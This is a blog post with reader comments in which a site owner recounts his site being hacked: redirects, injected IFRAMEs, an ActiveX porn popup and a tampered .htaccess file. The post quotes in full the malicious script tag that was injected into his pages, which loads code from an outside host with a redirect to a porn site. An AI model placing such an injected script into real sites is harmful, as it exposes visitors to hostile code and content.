Coincidental with my having the week off, I’ve been noticing bizarre behavior in regards to my site. Since I’m using a Mac I didn’t encounter anything outright, but my browser was downloading little “2DimensionOfExploitsEnc.php” files. Most often these text files would be blank, but occasionally I’d see some text. Yesterday I discovered an IFRAME was being added to my site, redirecting people to newiframe.biz. Today, I was seeing redirects to a site called Lahrah’s World, at elleseebee.com. Wanting to avoid any IFRAME trouble, I removed my Shoutbox and my online poll; but I restored them by the end of the day.What really got my attention was discovering something was adding code to my site! At the bottom of almost every page I was finding:
<script language="JavaScript" src="http://www.wizardsworldwide.com/\nchat/chat/localization/czech/catalog/spacer.gif?i\n=0c2a602a840a150cb337e2406913b775&to=\nhttp://www.fucklynx.com/lynx/Boobs/bigtits.html"></script>Interestingly, Wizards Worldwide appears to be a Harry Potter chat site. I wonder if the kids who avail themselves of it know it’s apparently a front for Czech hackers.
This was curious, but it still didn’t raise any alarm bells. It wasn’t till I looked at my webpage with a Windows browser that i found cause for alarm. As soon as it loaded in Internet Explorer, I was confronted with an Active X popup window asking me to click “OK” for free porn movies. My site had really been hacked.
There was no way I could allow this upon unsuspecting visitors. It’s one thing to accost them with dreadful content and halfbaked jokes. It’s another to force illegal porn sites on them. I had little idea how to solve the problem — you really should need a license to operate a website — so it seemed simpler to redirect the webpage myself. It was safer to simply steer people away. So, I edited my “.htaccess” file to send all visitors to Google. Then, since we’re nearing the end of the campaign trail, I wanted to get some last digs in by pointing to BuzzFlash. In the process I discovered someone had been monkeying with the “.htaccess” file. I fixed this and was thus able to restore access to my pMachine control panel — hence this update. It did not solve the problem with that JavaScript code, which, damn it all, is still showing up at the bottom of every page.
I’ll keep investigating. The blog will remain offline. And, in the interests of avoiding any similar problems from other ignorant amateur webmasters, all I can say is use Mozilla or get a Mac. (Or, perhaps, stay away from Microsoft software, even on a Mac.)
As you can see, the site came back up on Friday morning.
Mickey,
Have you figured out what is causing the java top be attached? We are having the same problem with our site and need to figure it out.
How did you fix this? I have this problem (which started while I was away as well) and there aren’t any results when I google this for a fix. I’m not sure where this thing lies, so any help you can provide would be greatly appreciated.
Joe
NYC
Joe,
I see Mickey and I use Ipower.com as web providers. Is that your provider also? If so it may be a virus on their servers.
Email me at <a href="mailto:caveboy@anthron.net ASAP
Russ
Is it safe? Evidently the problem resurfaced this morning but seems to be gone now.
Here’s a link to others’ server woes from back in June.
…Stupid Russian porn merchants.
Hey Mickey,
Brad, my webmaster, reported that the problem went away. Is yours cleard up? I wonder Did you send an email to I Power?
Russ
Yes, I sent them three over the last few days. I never got a response.
Mickey,
I assume you are nolonger having a problem with your page. We are not either.
I enjoy’d your page, and it seems we enjoy a comon link, (Jimmy Bufffet).
If our paths cross again it is karma.
Russ